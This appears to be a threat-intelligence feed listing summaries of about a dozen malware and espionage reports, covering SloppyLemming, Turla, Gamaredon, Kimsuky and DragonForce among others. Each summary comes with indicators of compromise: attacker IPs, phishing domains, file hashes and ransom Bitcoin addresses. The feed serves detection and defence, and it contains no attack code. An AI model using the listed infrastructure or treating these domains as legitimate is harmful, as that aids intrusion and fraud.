Unraveling SloppyLemming’s Operations Across South Asia |
An investigation reveals SloppyLemming, an advanced threat actor targeting South and East Asian countries, particularly Pakistan. The group uses multiple cloud services for credential harvesting, malware delivery, and command and control. Their operations focus on government, law enforcement, energy, telecommunications, and technology entities in Pakistan, Bangladesh, Sri Lanka, and China. SloppyLemming employs phishing tactics, exploits vulnerabilities, and utilizes various malware tools. The actor's lack of operational security has provided insights into their tooling and infrastructure. Cloudflare has taken steps to disrupt the actor's operations and collaborated with industry partners to mitigate the threat. |
Type |
Indicator |
IPv4 |
139.59.109.136 |
IPv4 |
142.93.139.164 |
IPv4 |
149.28.153.250 |
IPv4 |
185.249.198.218 |
IPv4 |
45.137.116.8 |
IPv4 |
47.245.126.218 |
IPv4 |
47.254.229.56 |
CVE |
CVE-2023-38831 |
FileHash-MD5 |
659ab8cb034e557fce0c3ecd631f3590 |
FileHash-MD5 |
e2a32e7d772a9a4eeccee9c71ec3a6d4 |
FileHash-MD5 |
fa40357daaa8ed8e73eeef25f0f478ac |
FileHash-SHA1 |
9b45b35d577680022e20d20dc7052463398ccf36 |
FileHash-SHA1 |
b53de85852479ea2a772bd3407b9e4d38eb1e1e7 |
FileHash-SHA1 |
bc490c61ce87efc0faf93dd4160219ef303e3e1d |
FileHash-SHA256 |
06f82a8d80ec911498e3493ebefa8ad45e102dd887ce2edc11f8f51bafab2e80 |
FileHash-SHA256 |
3dfb8d198de95090e2ad3ffc9d9846af5c3074563acb0ce5b0ef62b20e4bf432 |
FileHash-SHA256 |
82e99ceea9e6d31555b0f2bf637318fd97e5609e3d4d1341aec39db2e26cf211 |
FileHash-SHA256 |
95cf90b2610c6f0ec67c1d669cd252468f6c3b8eaeea588f342d2bd74d90e093 |
FileHash-SHA256 |
a3c9b56a0ce787d7aa7787d9ff0e806a6fb0b216327591b1e1113391c609fd17 |
FileHash-SHA256 |
ac3dff91982709f575cfbc6954b61130b4eeab5d3759772db220f1b76836be4d |
FileHash-SHA256 |
b6ae5b714f18ca40a111498d0991e1e30cd95317b4904d2ef0d49937f0552000 |
FileHash-SHA256 |
e3bc0246ab95b527aa86e52e62f554ab8db04523f35aee50b508d0fa48ab49f7 |
FileHash-SHA256 |
fb4397c837c7e401712764f953723153d5bb462bc944518959288ea47dec6446 |
IPv4 |
159.253.120.25 |
IPv4 |
159.65.6.251 |
IPv4 |
207.148.73.145 |
IPv4 |
208.85.22.252 |
IPv4 |
37.27.41.167 |
IPv4 |
47.236.65.190 |
IPv4 |
47.237.105.113 |
IPv4 |
47.237.20.135 |
IPv4 |
47.237.20.201 |
IPv4 |
47.237.25.198 |
IPv4 |
47.245.114.11 |
IPv4 |
47.245.2.77 |
IPv4 |
47.245.42.208 |
IPv4 |
47.245.56.29 |
IPv4 |
47.74.84.168 |
IPv4 |
47.74.87.155 |
IPv4 |
47.76.181.76 |
IPv4 |
47.76.61.241 |
IPv4 |
47.83.23.246 |
IPv4 |
8.219.114.124 |
IPv4 |
8.219.169.226 |
IPv4 |
8.222.235.145 |
domain |
cflayerprotection.com |
domain |
cloudlflares.com |
domain |
crec-bd.site |
domain |
email.click |
domain |
hit-pk.org |
domain |
humariweb.info |
domain |
itsupport-gov.com |
domain |
jammycanonicalupdates.cloud |
domain |
link.click |
domain |
modp-pk.org |
domain |
mofapak.info |
domain |
opensecurity-legacy.com |
domain |
paknavy-pk.org |
domain |
quran-books.store |
domain |
updpcn.online |
hostname |
accounts.opensecurity-legacy.com |
hostname |
acrobat.paknavy-pk.org |
hostname |
api.opensecurity-legacy.com |
hostname |
bin.opensecurity-legacy.com |
hostname |
blabla.apl-com.icu |
hostname |
browser.apl-org.online |
hostname |
cloud.adobefileshare.com |
hostname |
cloud.cflayerprotection.com |
hostname |
confidential.zapto.org |
hostname |
data.cloudlflares.com |
hostname |
dawn.apl-org.online |
hostname |
docs.apl-com.icu |
hostname |
fonts.apl-org.online |
hostname |
frontend-m.opensecurity-legacy.com |
hostname |
hesco.hascolgov.info |
hostname |
hurr.zapto.org |
hostname |
locaal.navybd-gov.info |
hostname |
localhost.apl-com.icu |
hostname |
locall.hascolgov.info |
hostname |
login.apl-org.online |
hostname |
m.opensecurity-legacy.com |
hostname |
mail.apl-com.icu |
hostname |
mail.pakistangov.com |
hostname |
mailpitb-securedocs.zapto.org |
hostname |
monitor.opensecurity-legacy.com |
hostname |
oil.hascolgov.info |
hostname |
openkm.paknavy-pk.org |
hostname |
owa-spamcheck.apl-org.online |
hostname |
pitb.zapto.org |
hostname |
redzone.apl-org.online |
hostname |
redzone2.apl-org.online |
hostname |
sco.zapto.org |
hostname |
secure.cflayerprotection.com |
hostname |
secure.cloudlflares.com |
hostname |
sensors.opensecurity-legacy.com |
hostname |
static.opensecurity-legacy.com |
hostname |
update.apl-org.online |
hostname |
www.168-gov.info |
hostname |
www.cloudlflares.com |
hostname |
www.crec-bd.site |
hostname |
zero-berlin-covenant.apl-org.online |
|
BBTok Targeting Brazil: Deobfuscating the .NET Loader with dnlib and PowerShell |
This analysis dissects the infection chain of BBTok, a Brazilian-targeted threat. The malware utilizes an ISO image containing a shortcut file and various components. It employs the Microsoft Build Engine to compile and execute malicious C# code on the victim's machine. The core component, Trammy.dll, is obfuscated using ConfuserEx and utilizes AppDomain Manager Injection for execution. The malware creates a log file, gathers system information, and establishes persistence through scheduled tasks and service creation. It downloads additional components, including CCProxy for traffic manipulation, and a Delphi payload. The attack specifically targets Brazilian IP addresses and employs evasion techniques to avoid detection. |
Type |
Indicator |
FileHash-MD5 |
3aeefe5867b49d1d323502e2b86d40e1 |
FileHash-MD5 |
4d7d4d92dc7d86b72abf81821ff83837 |
FileHash-MD5 |
950e785d417105c2a8dae00571ef7923 |
FileHash-MD5 |
c479d696d08fc9414920deae7983ca8e |
FileHash-SHA1 |
704efd1447be699762781a4b67e4c1ae1f7c9789 |
FileHash-SHA1 |
9672cade96c657a8860d60923afdbe4c46a2935d |
FileHash-SHA1 |
970cdb16e5fc52be85e311f6c28dbb75086f1cf3 |
FileHash-SHA1 |
cc9f6c4f482d5fce70ed907d781db2d409e15bc3 |
FileHash-SHA256 |
09027fa9653bdf2b4a291071f7e8a72f14d1ba5d0912ed188708f9edd6a084fe |
FileHash-SHA256 |
24fac4ef193014e34fc30f7a4b7ccc0b1232ab02f164f105888aabe06efbacc3 |
FileHash-SHA256 |
276a1e9f62e21c675fdad9c7bf0a489560cbd959ac617839aeb9a0bc3cd41366 |
FileHash-SHA256 |
27914c36fd422528d8370cbbc0e45af1ba2c3aeedca1579d92968649b3f562f7 |
FileHash-SHA256 |
2d2c2ba0f0d155233cdcbf41a9cf166a6ce9b80a6ab4395821ce658afe04aaba |
FileHash-SHA256 |
2ff420e3d01893868a50162df57e8463d1746d3965b76025ed88db9bb13388af |
FileHash-SHA256 |
35db2b34412ad7a1644a8ee82925a88369bc58f6effc11d8ec6d5f81650d897e |
FileHash-SHA256 |
5e5a58bfabd96f0c78c1e12fa2625aba9c84aa3bd4c9bb99d079d6ccb6e46650 |
FileHash-SHA256 |
7559c440245aeeca28e67b7f13d198ba8add343e8d48df92b7116a337c98b763 |
FileHash-SHA256 |
7566131ce0ecba1710c1a7552491120751b58d6d55f867e61a886b8e5606afc3 |
FileHash-SHA256 |
8e7f0a51d7593cf76576b767ab03ed331d822c09f6812015550dbd6843853ce7 |
FileHash-SHA256 |
a3afed0dabefde9bb8f8f905ab24fc2f554aa77e3a94b05ed35cffc20c201e15 |
FileHash-SHA256 |
ac044dd9ae8f18d928cf39d24525e2474930faf8e83c6e3ad52496ecab11f510 |
FileHash-SHA256 |
b60eb62f6c24d4a495a0dab95cc49624ac5099a2cc21f8bd010a410401ab8cc3 |
FileHash-SHA256 |
cb1d2659508a4f50060997ee0e60604598cb38bd2bb90962c6a51d8b798a03b6 |
FileHash-SHA256 |
dc03070d50fdd31c89491d139adfb211daf171d03e9e6d88aac43e7ff44e4fef |
FileHash-SHA256 |
ddf84fdc080bd55f6f2b409e596b6f7a040c4ab1eb4b965b3f709a0f7faa4e02 |
domain |
fileondemandd.site |
hostname |
contador.danfajuda.com |
|
Unraveling Sparkling Pisces’s Tool Set: KLogEXE and FPSpy |
Unit 42 researchers have uncovered two new malware samples used by the North Korean threat group Sparkling Pisces (aka Kimsuky). These include an undocumented keylogger called KLogEXE and a variant of a backdoor named FPSpy. The analysis reveals the group's evolving capabilities and extensive arsenal. Both malware samples share code similarities and utilize sophisticated techniques for data exfiltration and command execution. The research highlights Sparkling Pisces' continuous evolution, expanding infrastructure, and targeting of South Korean and Japanese entities. The discovery enhances understanding of the group's tactics and provides insights for better defense against such threats. |
Type |
Indicator |
FileHash-SHA256 |
2e768cee1c89ad5fc89be9df5061110d2a4953b336309014e0593eb65c75e715 |
FileHash-SHA256 |
990b7eec4e0d9a22ec0b5c82df535cf1666d9021f2e417b49dc5110a67228e27 |
FileHash-SHA256 |
a173a425d17b6f2362eca3c8ea4de9860b52faba414bbb22162895641dda0dc2 |
FileHash-SHA256 |
c69cd6a9a09405ae5a60acba2f9770c722afde952bd5a227a72393501b4f5343 |
FileHash-SHA256 |
faf666019333f4515f241c1d3fcfc25c67532463245e358b90f9e498fe4f6801 |
IPv4 |
152.32.138.167 |
hostname |
mail.apollo-page.r-e.kr |
hostname |
nidlogin.apollo.r-e.kr |
|
Analyzing the Newest Turla Backdoor |
The Russian APT group Turla has launched a new campaign using shortcut files to infect systems with a fileless backdoor. The malware employs evasion techniques such as disabling ETW and AMSI, and unhooking. The attack begins with a shortcut file mimicking a PDF, which creates a file executed using MSBuild. The final payload is a fileless backdoor obfuscated with SmartAssembly. The backdoor implements custom commands for file creation and PowerShell script execution. It communicates with the C2 server using encrypted and encoded data. The analysis reveals sophisticated techniques to avoid detection, including DLL mapping to bypass hooks and patching of ETW and AMSI-related functions. |
Type |
Indicator |
FileHash-MD5 |
005c762a3c39b1114c6521f52acb66c3 |
FileHash-MD5 |
371ef30b422378d95f64804391f24818 |
FileHash-MD5 |
a88597f35bf778f4a0c21d7f231c9091 |
FileHash-SHA1 |
19d576e1a7c0c7e6dae6dce79743db5f2defa79f |
FileHash-SHA1 |
47791e973dc71e23de8635d801509149d9d74288 |
FileHash-SHA1 |
bcbdff86daeb92215081dffc8660900816159721 |
FileHash-SHA256 |
7091ce97fb5906680c1b09558bafdf9681a81f5f524677b90fd0f7fc0a05bc00 |
FileHash-SHA256 |
8d6fe8e336e020410753ff15ece5f36bae992f7f234385a23590a11ed734792d |
FileHash-SHA256 |
b6abbeab6e000036c6cdffc57c096d796397263e280ea264eba73ac5bab39441 |
FileHash-SHA256 |
cac4d4364d20fa343bf681f6544b31995a57d8f69ee606c4675db60be5ae8775 |
hostname |
files.philbendeck.com |
|
Cyberespionage the Gamaredon way: Analysis of toolset used to spy on Ukraine in 2022 and 2023 |
This report provides a comprehensive analysis of the toolset used by the Russia-aligned Gamaredon APT group to conduct cyberespionage activities against Ukraine in 2022 and 2023. The group has been active since 2013 and is currently the most prolific threat actor targeting Ukrainian governmental institutions. Gamaredon employs a variety of custom malware tools written in PowerShell, VBScript, and C, as well as some open-source tools. The analysis covers their tactics for initial access, including spearphishing and weaponized documents and USB drives. It details numerous tools used for downloading payloads, dropping files, weaponizing systems, stealing data, and maintaining backdoor access. The report also examines Gamaredon's obfuscation techniques, network infrastructure, and methods for bypassing domain-based blocking. |
Type |
Indicator |
IPv4 |
5.181.156.109 |
IPv4 |
161.35.106.28 |
IPv4 |
185.163.47.177 |
IPv4 |
185.225.19.16 |
FileHash-SHA1 |
025e3d88c53fc12d5a4aab726e696f2815bac84d |
FileHash-SHA1 |
04f1ed3050d6b2527d6196dff5845b10510d0c2f |
FileHash-SHA1 |
0fa9303ed739a3c6a76cef4517b9adb60c73ca80 |
FileHash-SHA1 |
0fd02b12517221f71a4a3774630c05643ee59988 |
FileHash-SHA1 |
13ba279d8602fee7cede152b6a9148cd9d2f6662 |
FileHash-SHA1 |
16fd6cba3f13cc5b195cd6c0dd33bbf08cd0fe39 |
FileHash-SHA1 |
1aeae7a567c71200ba804801c4cec227d2b64414 |
FileHash-SHA1 |
224b18e531e511cea2849d9a3b9cf5ad502afecc |
FileHash-SHA1 |
2416dfc031cf0d05054d5beb9739cba6470fe585 |
FileHash-SHA1 |
28f4f0367c2bb0574c8a7d1b9c3e71e6ac678300 |
FileHash-SHA1 |
2b9b0ad0b65bb6101704684cd339e946fae2dcfa |
FileHash-SHA1 |
2cdb1da4df1a33e379c2f24dd6a05709f4848cb6 |
FileHash-SHA1 |
44c720ae508f448263a83cac26775d6709dfbbdd |
FileHash-SHA1 |
47a03ebb9798a8df7ec8212134d418e937b449e9 |
FileHash-SHA1 |
49cf239ab2ebd04cafdcec07fbb0c1c1a43e8c02 |
FileHash-SHA1 |
4f915541291120aa100123c1c93fa7de78f46a3f |
FileHash-SHA1 |
565a4cd6e4f74e17a37d34e6ef93ab6ded71b3aa |
FileHash-SHA1 |
5720ffdf9d9cd649445cbc12844e2b587622643a |
FileHash-SHA1 |
5befc01a3771e61151224e18f926226ff7fd4a40 |
FileHash-SHA1 |
6d694b73a2c497f16eb9b5cca883658397ffbedf |
FileHash-SHA1 |
742e34ba21650ecb0b7ef33f786641f0be823be8 |
FileHash-SHA1 |
7793282401b134077e70217b55b0c4b45850d119 |
FileHash-SHA1 |
801a9b08987977692223b7105dec8b21b9d9749e |
FileHash-SHA1 |
82123c17117ef235f3b57d0c5572c861e3ed7173 |
FileHash-SHA1 |
821362a484908e93f8ba748b600665ae6444303d |
FileHash-SHA1 |
8a2261d8c8111d2d99276575120b9ea65d0aeaea |
FileHash-SHA1 |
9a6b36e6cad9156ea6e09de740d3f1ccb6816f87 |
FileHash-SHA1 |
9b6ef236d9dc758336f1d89268822f8611c8b973 |
FileHash-SHA1 |
9e30dffdb88dd3adfab4cd5c67a98336c4bf9504 |
FileHash-SHA1 |
a3c21f9a493a05f9428e8f5fe5af7f0c2bf67f95 |
FileHash-SHA1 |
a93503bbb613f084add338b9fa2eee466bf3a2d6 |
FileHash-SHA1 |
ac17fd08a3987cc91dfd6649ba3dabe8a9671305 |
FileHash-SHA1 |
b08305c557692619b9d0eaf5b58a8b91858cf4d5 |
FileHash-SHA1 |
b2b58cef19546b2d2284b2eb5f22b6d8fdb94d4e |
FileHash-SHA1 |
b50f10bbdb49be6d868b09f3e1dd6c78d58d8e89 |
FileHash-SHA1 |
b99d4724077b0a2cbeee38332c05f3d4171c9dcc |
FileHash-SHA1 |
ba2366ed4e83ffc6dec489c9011fe181ce169a47 |
FileHash-SHA1 |
ba5f7e2fa9be1cb3fc7ae113f41c36e4f2c464b6 |
FileHash-SHA1 |
cb9712bed15723973171192da17946bf6778d98d |
FileHash-SHA1 |
d5576e578518e474a5dff654c44ab3ec4a6e4ecf |
FileHash-SHA1 |
d58bfb39969f28698f90bf2e8782057e2f83c2df |
FileHash-SHA1 |
df1c0a70e7a02b839ab3aac3fc410e61eefb58eb |
FileHash-SHA1 |
e0bd8855159cb708789c4de183e107c5c117fba1 |
FileHash-SHA1 |
e2feee0b92819ac7fca85cfe3dc37750834f0990 |
FileHash-SHA1 |
e537deaf3a77c5c0f0b9f8a12ff5995dd24cd259 |
FileHash-SHA1 |
f05874c1b908fdef4b9af2b084e3d813595a12c9 |
FileHash-SHA1 |
fea57a486eb4bdac5e7d59c9958c42293a5abe12 |
IPv4 |
141.98.233.17 |
IPv4 |
143.198.160.45 |
IPv4 |
159.223.152.63 |
IPv4 |
164.92.115.188 |
IPv4 |
165.227.208.207 |
IPv4 |
167.172.139.39 |
IPv4 |
185.163.45.5 |
IPv4 |
188.166.247.34 |
IPv4 |
194.180.191.30 |
IPv4 |
195.133.88.128 |
IPv4 |
209.97.165.187 |
IPv4 |
212.18.104.56 |
IPv4 |
46.29.234.46 |
IPv4 |
5.252.178.140 |
IPv4 |
62.133.62.73 |
IPv4 |
67.205.160.237 |
IPv4 |
68.183.2.92 |
IPv4 |
80.90.181.107 |
IPv4 |
89.185.84.141 |
IPv4 |
89.185.84.204 |
IPv4 |
89.19.209.154 |
IPv4 |
89.23.107.188 |
IPv4 |
91.200.148.232 |
domain |
absorbeni.ru |
domain |
amasiyagi.ru |
domain |
consentesto.ru |
domain |
dfgqdsd.ru |
domain |
fritopa.ru |
domain |
goloser.ru |
domain |
hakold.ru |
domain |
havxcq.ru |
domain |
hulortad.ru |
domain |
lokalut.ru |
domain |
loturam.ru |
domain |
marginisbi.ru |
domain |
nikortal.ru |
domain |
nododru.ru |
domain |
opela.ru |
domain |
retarus.ru |
domain |
rieturc.ru |
domain |
statuesque.ru |
domain |
tolofa.ru |
domain |
using.ru |
domain |
youdad.ru |
hostname |
login.kifales.ru |
hostname |
www.toorisugita.ru |
|
MimiStick — imitators of Sticky Werewolf |
F.A.C.C.T. Threat Intelligence discovered a malicious file targeting Russian defense industry enterprises. Initially thought to be the work of Sticky Werewolf, further analysis revealed a new threat actor named MimiStick. The attack used a PDF lure mimicking a letter from the Russian Ministry of Labor. The malware employed a multi-stage infection chain, ultimately deploying a Sliver implant. Later findings confirmed the campaign was indeed Sticky Werewolf, who had expanded their toolkit to include Sliver implant alongside their existing Quasar RAT. The group registered multiple domains, including one impersonating the Ministry of Labor, likely for future phishing campaigns. |
Type |
Indicator |
FileHash-MD5 |
0756de02dd3b4be840d31c8871148f7f |
FileHash-MD5 |
5ed144351c41eb690d86c523690eb265 |
FileHash-MD5 |
67aa63c4518a3604e37f89ad0d39a34d |
FileHash-MD5 |
725e5068bd68c3d055f3a814f402a8be |
FileHash-MD5 |
7e151444c98ef2cf084eed8e6d4be807 |
FileHash-MD5 |
873454911a81a6c892838c44cbb3059b |
FileHash-SHA1 |
2849ad434d55b8f2bc067c37903b5ff5bad01dbd |
FileHash-SHA1 |
3100e869b1052dee920f7f2ca35da60abdf5aac0 |
FileHash-SHA1 |
3fba74f0f7f91f665ad68db9004f1fec3486595b |
FileHash-SHA1 |
c15716d127961eb1ca4c4d6192af6e1c5c8a2d8d |
FileHash-SHA1 |
e8ba03b13f9b51abcc9a539d09f98b61b2b4ccd0 |
FileHash-SHA1 |
efd81a26fd43124d435bc0223c5f42839f793d42 |
FileHash-SHA256 |
3877f9fd6b21ee735130421dcf997cf000ae66b20a1c6a490f23431b2f95fa90 |
FileHash-SHA256 |
5ad093aa3eaf2bb76003f8f2f9de9b1368640aa320fa8d77df2c773f75186a71 |
FileHash-SHA256 |
65096aa2895025d94b934eb4198ea160e067e8e5c97d9ea252cb2de3870b7b2f |
FileHash-SHA256 |
8d83a598aa61a3f2e61bfdcdfc7b29b4c8d357eb43562d349053defa1ce50d78 |
FileHash-SHA256 |
b262dd5373213c5af573a08b409f8142c7f9f92b19536d7d78b4515d23452321 |
FileHash-SHA256 |
ff16334c4cbbfed4bfca23436493397d0465c643cce6cbe41426067bb1ce14ff |
IPv4 |
213.183.54.123 |
domain |
about-tech.ru |
domain |
borosan.ru |
domain |
min-trud-gov.ru |
domain |
mysafer.ru |
domain |
orkprank.ru |
domain |
rtxcore.ru |
domain |
techitzone.ru |
|
Iran-based Cyber Actors Enabling Ransomware Attacks on US Organizations |
This advisory outlines the activities of an Iran-based cyber threat group that has conducted numerous intrusions against organizations in the United States and other countries since 2017, with the goal of obtaining network access to facilitate ransomware attacks. The group, known by various names such as Pioneer Kitten and UNC757, exploits vulnerabilities in public-facing devices to gain initial access, and then uses techniques like credential theft, remote access tools, and webshells to maintain persistence and move laterally within compromised networks. A significant portion of their operations involves collaborating with ransomware affiliates like NoEscape and ALPHV to deploy ransomware and extort victims. The advisory provides details on the group's tactics, techniques, procedures, indicators of compromise, and recommended mitigations. |
Type |
Indicator |
BitcoinAddress |
bc1q2egjjzmchtm3q3h3een37zsvpph86hwgq4xskh |
BitcoinAddress |
bc1q6620fmev7cvkfu82z43vwjtec6mzgcp5hjrdne |
BitcoinAddress |
bc1q6w2an66vrje747scecrgzucw9ksha66x9zt980 |
BitcoinAddress |
bc1q8n7jjgdepuym825zwwftr3qpem3tnjx3m50ku0 |
BitcoinAddress |
bc1qjzw7sh3pd5msgehdaurzv04pm40hm9ajpwjqky |
BitcoinAddress |
bc1ql837eewad47zn0uzzjfgqjhsnf2yhkyxvxyjjc |
BitcoinAddress |
bc1qlwd94gf5uhdpu4gynk6znc5j3rwk9s53c0dhjs |
BitcoinAddress |
bc1qn5tla384qxpl6zt7kd068hvl7y4a6rt684ufqp |
BitcoinAddress |
bc1qr6h2zcxlntpcjystxdf7qy2755p25yrwucm4lq |
BitcoinAddress |
bc1qsn4l6h3mhyhmr72vw4ajxf2gr74hwpalks2tp9 |
BitcoinAddress |
bc1qtjhvqkun4uxtr4qmq6s3f7j49nr4sp0wywp489 |
BitcoinAddress |
bc1qx9tteqhama2x2w9vwqsyny6hldh8my8udx5jlm |
BitcoinAddress |
bc1qy8pnttrfmyu4l3qcy59gmllzqq66gmr446ppcr |
BitcoinAddress |
bc1qz75atxj4dvgezyuspw8yz9khtkuk5jpdgfauq8 |
FileHash-SHA256 |
0a6f992e1372db4f245595424a7436ebb610775d6addc4d568acc2af5d315221 |
FileHash-SHA256 |
14f8ad7d1553d1a47cf4c9e7bedabcc5b759c86e54c636175a472c11d7dec70f |
FileHash-SHA256 |
185ada4556737a4f26ae16f1a99ca82ab5684c32719ee426c420c0bc14384a0a |
FileHash-SHA256 |
2c76104c9aaaf32453a814c227e7d9d755451b551a3fd30d2ea332df396b3a31 |
FileHash-SHA256 |
3488458145eb62d7d3947e3811234f4663d9b5aeef6584ab08a2099a7f946664 |
FileHash-SHA256 |
b761680e23f2ebb5f6887d315ebd05b2d7c365731e093b49adb059c3dccaa30c |
FileHash-SHA256 |
ea2ec0c3859d8d8c36d95a298beef6d7add17856655bfbea2554b8714f7c7c69 |
domain |
githubapp.net |
hostname |
api.gupdate.net |
hostname |
cloud.sophos.one |
hostname |
login.forticloud.online |
|
Inside the Dragon: DragonForce Ransomware Group |
In this blog, Group-IB delves into the inner workings of the DragonForce ransomware group. Discovered in August 2023, DragonForce has been targeting companies in critical sectors using a variant of a leaked LockBit3.0 builder, and more recently in July 2024 with their own variant of ransomware. DragonForce operates a Ransomware-as-a-Service (RaaS) affiliate program utilizing a variant of LockBit3.0, and the other, though initially claimed as original, is based on ContiV3. The group employs double extortion tactics, encrypting data, and threatening leaks unless a ransom is paid. |
Type |
Indicator |
IPv4 |
185.73.125.8 |
IPv4 |
94.232.46.202 |
IPv4 |
69.4.234.20 |
IPv4 |
2.147.68.96 |
IPv4 |
185.59.221.75 |
FileHash-MD5 |
97b70e89b5313612a9e7a339ee82ab67 |
FileHash-MD5 |
a50637f5f7a3e462135c0ae7c7af0d91 |
FileHash-MD5 |
bb7c575e798ff5243b5014777253635d |
FileHash-MD5 |
c111476f7b394776b515249ecb6b20e6 |
|
Infrastructure linking PandorahVNC and Mesh Central |
This analysis investigates PandorahVNC, a sophisticated Hidden Virtual Network Computing tool, and its connections to a new service called AnonVNC. The report explores the online presence of the tool's creator, known as 'All_father', and examines the infrastructure used for both PandorahVNC and AnonVNC. It reveals links between these services and MeshCentral, a legitimate remote session manager. The investigation uncovers potential new developments in the creator's toolkit, including the use of MeshCentral's Mesh Agent. The report also discusses various threat actors who have leveraged PandorahVNC for malicious purposes, ranging from state-sponsored groups to cybercriminals. |
Type |
Indicator |
IPv4 |
62.112.11.136 |
FileHash-MD5 |
c7c699eb8695a564fe0b400b1bf138ba |
FileHash-SHA1 |
52e3be4428c5c2b42d64ba9bcc584472391157c5 |
IPv4 |
141.95.6.166 |
IPv4 |
51.254.27.112 |
IPv4 |
66.94.109.162 |
IPv4 |
94.131.121.91 |
domain |
anonvnc.com |
domain |
hiddenvnc.com |
domain |
hvncs.com |
domain |
pandorahvnc.shop |
domain |
validatax.com |
domain |
vncapk.io |
|
LummaC2: Obfuscation Through Indirect Control Flow |
This analysis examines a control flow obfuscation technique used by recent LummaC2 stealer samples. The malware employs customized control flow indirection to manipulate execution, hindering reverse engineering and automated analysis. The obfuscation transforms functions into 'dispatcher blocks' that use encoded offsets and indirect jumps to obscure the original control flow. Three main dispatcher types are identified: register-based, memory-based, and mixed-order. The analysis also covers conditional dispatcher logic for loops and syscalls. To deobfuscate, the researchers developed an automated method using symbolic backward slicing to differentiate dispatcher instructions from original code and recover the true control flow. This allows rebuilding deobfuscated functions for analysis. |
Type |
Indicator |
FileHash-MD5 |
205e45e123aea66d444feaba9a846748 |
FileHash-MD5 |
5099026603c86efbcf943449cd6df54a |
FileHash-MD5 |
d01e27462252c573f66a14bb03c09dd2 |
|
Sophisticated Malware Campaign Targets Czech Officials Using NATO-Themed Decoys |
Seqrite Labs APT-Team discovered a sophisticated malware campaign targeting government and military officials in the Czech Republic. The campaign leveraged NATO-themed decoy documents to lure victims and employed a multistage attack chain involving a malicious batch script, a Rust-based loader, and the Havoc post-exploitation framework. The campaign utilized advanced techniques like ETW patching, process injection, and encrypted payloads to evade detection and establish persistence on compromised systems. The threat actor behind the operation appears to have Russian origins and used open-source offensive tools extensively. |
Type |
Indicator |
FileHash-MD5 |
00a78177ed7a711c8cdddcb73d4f9784 |
FileHash-MD5 |
6eb2eb8f723163932b51ffb5274f5304 |
FileHash-MD5 |
a077b9179728e25aad4334f89bd5dd36 |
FileHash-MD5 |
a08edbfab6084c1861f8e7aecaf8c25d |
FileHash-MD5 |
a8d7e56eb01a8cf576533db9af2e92ec |
FileHash-MD5 |
b31b8310a136a0ba4e90b368a351f53f |
FileHash-MD5 |
de31247081978512be6a8ca58b4752a4 |
FileHash-SHA1 |
192f767c2d27966f50109fb62ff645fe38cc8d97 |
FileHash-SHA1 |
20ed156d55454bf084004b39115073d0b2551355 |
FileHash-SHA1 |
3593d39611d8e1ecb190ec76cedab4c1e214be72 |
FileHash-SHA1 |
6c1bdbc71f93642f0b5b9dfc85ae1501510f5e12 |
FileHash-SHA1 |
8d2e67d031ce8d3c7f65dcdf7dfcdd28dea19bd9 |
FileHash-SHA1 |
a960549eb634dbc781dc617f9000d3d29aa8711a |
FileHash-SHA1 |
ab26bff6f61dfe1fef20656e364c4492ba1ab335 |
FileHash-SHA256 |
1dbcade04333b9dc81ba0746bc604d12489da49b9b65fcb5b1f61d139dc5949c |
FileHash-SHA256 |
38da8d1576bdd0a03e649e8e6543594b35a423aa5b0a0c4081fc477c8e487e09 |
FileHash-SHA256 |
436994d4a5c8d54acb2b521d0847d77e6af6c2c0e40468248b1dd019c6dafa84 |
FileHash-SHA256 |
6e0d12cd0252599fd1dec7aa460cae7a12a1b2e322b6664e64c773c23627d1b4 |
FileHash-SHA256 |
8820e0c249305ffa3d38e72a7f27c0e2195bc739d08f5d270884be6237eea500 |
FileHash-SHA256 |
9549d3d2b8e8b4e8f163a8b9fa3b02b8a28d78e4b583baccb6210ef267559c6e |
FileHash-SHA256 |
a05d053174b52a9b158a5ec841c1a7633b9368c4ac2da371a11a9364f8a8dc60 |
FileHash-SHA256 |
ace33243994a9da0797601bdd4191e25967a1da2644f0d0b530e26c71854d5d9 |
FileHash-SHA256 |
b29ed89e0428ba476459adabb5630c8d29f7fee5905c5de10d792fe3a02e52a6 |
FileHash-SHA256 |
ed6775184051ef36c3049e24167471ab42bd4301e99631c8423d4d753cdad455 |
FileHash-SHA256 |
fda71a7de6d473826465bb83210107501e66a5d96e533772444b3b24806286fd |
URL |
https://206.188.197.113/ |
|
WalletConnect Scam: A Case Study in Crypto Drainer Tactics |
An investigation uncovered a malicious app on Google Play targeting mobile users to steal cryptocurrency. The app, posing as a legitimate WalletConnect tool, used advanced evasion techniques to avoid detection for nearly five months. It achieved over 10,000 downloads through fake reviews and branding. The attackers used social engineering and a modern crypto drainer toolkit, stealing approximately $70,000 from over 150 victims. The malware, identified as MS Drainer, supports multiple blockchains and employs sophisticated methods to drain user wallets. This case highlights the growing sophistication of cybercriminal tactics in decentralized finance, emphasizing the need for vigilance among users and improved security measures in app stores. |
Type |
Indicator |
FileHash-SHA256 |
42330ccaaacea8a18794c7e9fad100de31ea415bff7821e407b9ac70ef690032 |
FileHash-SHA256 |
bf557e975733c113acc38daa18ca1849a1022b4c30b118899f68210cd3c7f990 |
FileHash-SHA256 |
ea526792150e71402f896ddaf1f04aedcb1356aea3bfebbcaf6c90bcdde7aa0c |
domain |
cakeserver.online |
domain |
mestoxcalculator.com |
domain |
web3protocol.online |
|
HZ Rat backdoor for macOS harvests data from WeChat and DingTalk |
A version of the HZ Rat backdoor targeting users of China’s WeChat and DingTalk was uploaded to VirusTotal in July 2023 and was not detected by any vendor, research by Kaspersky suggests. |
Type |
Indicator |
FileHash-MD5 |
0c3201d0743c63075b18023bb8071e73 |
FileHash-MD5 |
287ccbf005667b263e0e8a1ccfb8daec |
FileHash-MD5 |
6cc838049ece4fcb36386b7a3032171f |
FileHash-MD5 |
6d478c7f94d95981eb4b6508844050a6 |
FileHash-MD5 |
7005c9c6e2502992017f1ffc8ef8a9b9 |
FileHash-MD5 |
7355e0790c111a59af377babedee9018 |
FileHash-MD5 |
7a66cd84e2d007664a66679e86832202 |
FileHash-MD5 |
7ed3fc831922733d70fb08da7a244224 |
FileHash-MD5 |
8d33f667ca135a88f5bf77a0fab209d4 |
FileHash-MD5 |
9cdb61a758afd9a893add4cef5608914 |
FileHash-MD5 |
a5af0471e31e5b11fd4d3671501dfc32 |
FileHash-MD5 |
da07b0608195a2d5481ad6de3cc6f195 |
FileHash-MD5 |
dd71b279a0bf618bbe9bb5d934ce9caa |
|
SilentSelfie: Revealing a major campaign against Kurdish websites |
